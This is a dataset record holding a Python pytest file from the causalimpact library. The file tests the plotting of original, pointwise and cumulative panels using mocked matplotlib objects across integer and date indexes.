hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5b247673dd04b44a067be2d37427fec3c7c80590
| 35,100
|
py
|
Python
|
tests/test_plot.py
|
david-ml/causalimpact
|
64c0206fe3339fe24c6de95a41251438d9bfc672
|
[
"Apache-2.0"
] | 5
|
2020-11-12T01:19:12.000Z
|
2021-12-17T12:50:38.000Z
|
tests/test_plot.py
|
david-ml/causalimpact
|
64c0206fe3339fe24c6de95a41251438d9bfc672
|
[
"Apache-2.0"
] | null | null | null |
tests/test_plot.py
|
david-ml/causalimpact
|
64c0206fe3339fe24c6de95a41251438d9bfc672
|
[
"Apache-2.0"
] | 3
|
2018-11-28T14:17:57.000Z
|
2021-07-14T20:41:39.000Z
|
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for module plot.py. Module matplotlib is not required as it's mocked accordingly.
"""
from __future__ import absolute_import, division, print_function
from datetime import datetime, timedelta
import mock
import pandas as pd
import pytest
from numpy.testing import assert_array_equal
from pandas import Timestamp
import causalimpact.plot as plot
from causalimpact import CausalImpact
def test_plot_original_panel(rand_data, pre_int_period, post_int_period, monkeypatch):
    """'original' panel with an integer index: observed y and predictions are
    plotted with a confidence band, and the diffuse-initialization note is added."""
    ci = CausalImpact(rand_data, pre_int_period, post_int_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['original'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    plotter_mock.subplot.assert_any_call(1, 1, 1)
    ax_args = ax_mock.plot.call_args_list
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    assert_array_equal(pd.concat([ci.pre_data.iloc[llb:, 0], ci.post_data.iloc[:, 0]]),
                       ax_args[0][0][0])
    assert ax_args[0][0][1] == 'k'
    assert ax_args[0][1] == {'label': 'y'}
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['preds'], ax_args[1][0][0])
    assert ax_args[1][0][1] == 'b--'
    assert ax_args[1][1] == {'label': 'Predicted'}
    # Vertical marker at the end of the pre-intervention period.
    ax_mock.axvline.assert_called_with(ci.pre_period[1], c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['preds'].index)
    assert_array_equal(ax_args[0][1], inferences['preds_lower'])
    assert_array_equal(ax_args[0][2], inferences['preds_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_original_panel_gap_data(rand_data, pre_int_gap_period,
                                      post_int_gap_period, monkeypatch):
    """'original' panel when there is a gap between pre and post periods."""
    ci = CausalImpact(rand_data, pre_int_gap_period, post_int_gap_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['original'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    plotter_mock.subplot.assert_any_call(1, 1, 1)
    ax_args = ax_mock.plot.call_args_list
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    assert_array_equal(pd.concat([ci.pre_data.iloc[llb:, 0], ci.post_data.iloc[:, 0]]),
                       ax_args[0][0][0])
    assert ax_args[0][0][1] == 'k'
    assert ax_args[0][1] == {'label': 'y'}
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['preds'], ax_args[1][0][0])
    assert ax_args[1][0][1] == 'b--'
    assert ax_args[1][1] == {'label': 'Predicted'}
    # Vertical marker at the end of the pre-intervention period.
    ax_mock.axvline.assert_called_with(ci.pre_period[1], c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['preds'].index)
    assert_array_equal(ax_args[0][1], inferences['preds_lower'])
    assert_array_equal(ax_args[0][2], inferences['preds_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_original_panel_date_index(date_rand_data, pre_str_period, post_str_period,
                                        monkeypatch):
    """'original' panel with a date index: the intervention marker is the
    Timestamp one day before the post period starts."""
    ci = CausalImpact(date_rand_data, pre_str_period, post_str_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['original'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    plotter_mock.subplot.assert_any_call(1, 1, 1)
    ax_args = ax_mock.plot.call_args_list
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    assert_array_equal(ci.data.iloc[llb:, 0], ax_args[0][0][0])
    assert ax_args[0][0][1] == 'k'
    assert ax_args[0][1] == {'label': 'y'}
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['preds'], ax_args[1][0][0])
    assert ax_args[1][0][1] == 'b--'
    assert ax_args[1][1] == {'label': 'Predicted'}
    # Expected axvline position: one day before the post period begins.
    date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
    date_ = date_ + timedelta(days=-1)
    date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
    ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['preds'].index)
    assert_array_equal(ax_args[0][1], inferences['preds_lower'])
    assert_array_equal(ax_args[0][2], inferences['preds_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_original_panel_gap_date_index(date_rand_data, pre_str_gap_period,
                                            post_str_gap_period, monkeypatch):
    """'original' panel with a date index and a gap between pre and post
    periods: the intervention marker is the end of the pre period itself."""
    ci = CausalImpact(date_rand_data, pre_str_gap_period, post_str_gap_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['original'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    plotter_mock.subplot.assert_any_call(1, 1, 1)
    ax_args = ax_mock.plot.call_args_list
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    assert_array_equal(pd.concat([ci.pre_data.iloc[llb:, 0], ci.post_data.iloc[:, 0]]),
                       ax_args[0][0][0])
    assert ax_args[0][0][1] == 'k'
    assert ax_args[0][1] == {'label': 'y'}
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['preds'], ax_args[1][0][0])
    assert ax_args[1][0][1] == 'b--'
    assert ax_args[1][1] == {'label': 'Predicted'}
    # With a gap, the marker sits at the pre period's last date (no -1 day).
    date_ = datetime.strptime(ci.pre_period[1], "%Y%m%d")
    date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
    ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['preds'].index)
    assert_array_equal(ax_args[0][1], inferences['preds_lower'])
    assert_array_equal(ax_args[0][2], inferences['preds_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_original_panel_date_index_no_freq(date_rand_data, pre_str_period,
                                                post_str_period, monkeypatch):
    """'original' panel with a date index whose frequency cannot be inferred.

    Rows are removed from the middle of the index so pandas cannot infer a
    frequency; the plot must still render the same elements.
    """
    dd = date_rand_data.copy()
    # BUG FIX: `DataFrame.drop` is not in-place — the result must be
    # reassigned, otherwise `dd` keeps its full (regular-frequency) index and
    # the no-frequency scenario is never actually exercised.
    dd = dd.drop(dd.index[10:20])
    ci = CausalImpact(dd, pre_str_period, post_str_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['original'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    plotter_mock.subplot.assert_any_call(1, 1, 1)
    ax_args = ax_mock.plot.call_args_list
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    assert_array_equal(ci.data.iloc[llb:, 0], ax_args[0][0][0])
    assert ax_args[0][0][1] == 'k'
    assert ax_args[0][1] == {'label': 'y'}
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['preds'], ax_args[1][0][0])
    assert ax_args[1][0][1] == 'b--'
    assert ax_args[1][1] == {'label': 'Predicted'}
    # Expected axvline position: one day before the post period begins.
    date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
    date_ = date_ + timedelta(days=-1)
    date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
    ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['preds'].index)
    assert_array_equal(ax_args[0][1], inferences['preds_lower'])
    assert_array_equal(ax_args[0][2], inferences['preds_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_pointwise_panel(rand_data, pre_int_period, post_int_period, monkeypatch):
    """'pointwise' panel: point effects with confidence band and zero line."""
    ci = CausalImpact(rand_data, pre_int_period, post_int_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['pointwise'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    # Pointwise panel shares its x axis with the first subplot.
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['point_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Point Effects'}
    # Marker one step before the post period starts (integer index).
    ax_mock.axvline.assert_called_with(ci.post_period[0] - 1, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_pointwise_panel_gap_data(rand_data, pre_int_gap_period,
                                       post_int_gap_period, monkeypatch):
    """'pointwise' panel with a gap between pre and post periods."""
    ci = CausalImpact(rand_data, pre_int_gap_period, post_int_gap_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['pointwise'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    # Pointwise panel shares its x axis with the first subplot.
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['point_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Point Effects'}
    # With a gap, the marker sits at the pre period's last point.
    ax_mock.axvline.assert_called_with(ci.pre_period[1], c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_pointwise_panel_date_index(date_rand_data, pre_str_period, post_str_period,
                                         monkeypatch):
    """'pointwise' panel with a date index."""
    ci = CausalImpact(date_rand_data, pre_str_period, post_str_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['pointwise'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    # Pointwise panel shares its x axis with the first subplot.
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['point_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Point Effects'}
    # Expected axvline position: one day before the post period begins.
    date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
    date_ = date_ + timedelta(days=-1)
    date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
    ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_pointwise_panel_gap_date_index(date_rand_data, pre_str_gap_period,
                                             post_str_gap_period, monkeypatch):
    """'pointwise' panel with a date index and a pre/post period gap."""
    ci = CausalImpact(date_rand_data, pre_str_gap_period, post_str_gap_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['pointwise'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    # Pointwise panel shares its x axis with the first subplot.
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['point_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Point Effects'}
    # With a gap, the marker sits at the pre period's last date (no -1 day).
    date_ = datetime.strptime(ci.pre_period[1], "%Y%m%d")
    date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
    ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_pointwise_panel_date_index_no_freq(date_rand_data, pre_str_period,
                                                 post_str_period, monkeypatch):
    """'pointwise' panel with a date index whose frequency cannot be inferred.

    Rows are removed from the middle of the index so pandas cannot infer a
    frequency; the plot must still render the same elements.
    """
    dd = date_rand_data.copy()
    # BUG FIX: `DataFrame.drop` is not in-place — reassign the result.
    dd = dd.drop(dd.index[10:20])
    # BUG FIX: the model must be built from `dd` (the irregular-index data),
    # not from the untouched `date_rand_data`, otherwise `dd` is unused and
    # the no-frequency scenario is never exercised.
    ci = CausalImpact(dd, pre_str_period, post_str_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['pointwise'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    # Pointwise panel shares its x axis with the first subplot.
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['point_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Point Effects'}
    # Expected axvline position: one day before the post period begins.
    date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
    date_ = date_ + timedelta(days=-1)
    date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
    ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
def test_plot_cumulative_panel(rand_data, pre_int_period, post_int_period, monkeypatch):
    """'cumulative' panel: cumulative effect with confidence band and zero line."""
    ci = CausalImpact(rand_data, pre_int_period, post_int_period)
    # Replace the matplotlib plotter with mocks so no real figure is created.
    ax_mock = mock.Mock()
    plotter_mock = mock.Mock()
    plotter_mock.subplot.return_value = ax_mock
    plot_mock = mock.Mock(return_value=plotter_mock)
    fig_mock = mock.Mock()
    plotter_mock.figure.return_value = fig_mock
    monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
    ci.plot(panels=['cumulative'])
    plot_mock.assert_called_once()
    plotter_mock.figure.assert_called_with(figsize=(15, 12))
    # Cumulative panel shares its x axis with the first subplot.
    plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
    ax_args = ax_mock.plot.call_args
    # Observations burned by approximate diffuse initialization are excluded.
    llb = ci.trained_model.filter_results.loglikelihood_burn
    inferences = ci.inferences.iloc[llb:, :]
    assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
    assert ax_args[0][1] == 'b--'
    assert ax_args[1] == {'label': 'Cumulative Effect'}
    # Marker one step before the post period starts (integer index).
    ax_mock.axvline.assert_called_with(ci.post_period[0] - 1, c='k', linestyle='--')
    ax_args = ax_mock.fill_between.call_args_list[0]
    assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
    assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
    assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
    assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
    ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
    ax_mock.grid.assert_called_with(True, linestyle='--')
    ax_mock.legend.assert_called()
    plotter_mock.show.assert_called_once()
    fig_mock.text.assert_called_once_with(
        0.1,
        0.01,
        ('Note: The first 1 observations were removed due to approximate diffuse '
         'initialization.'),
        fontsize='large'
    )
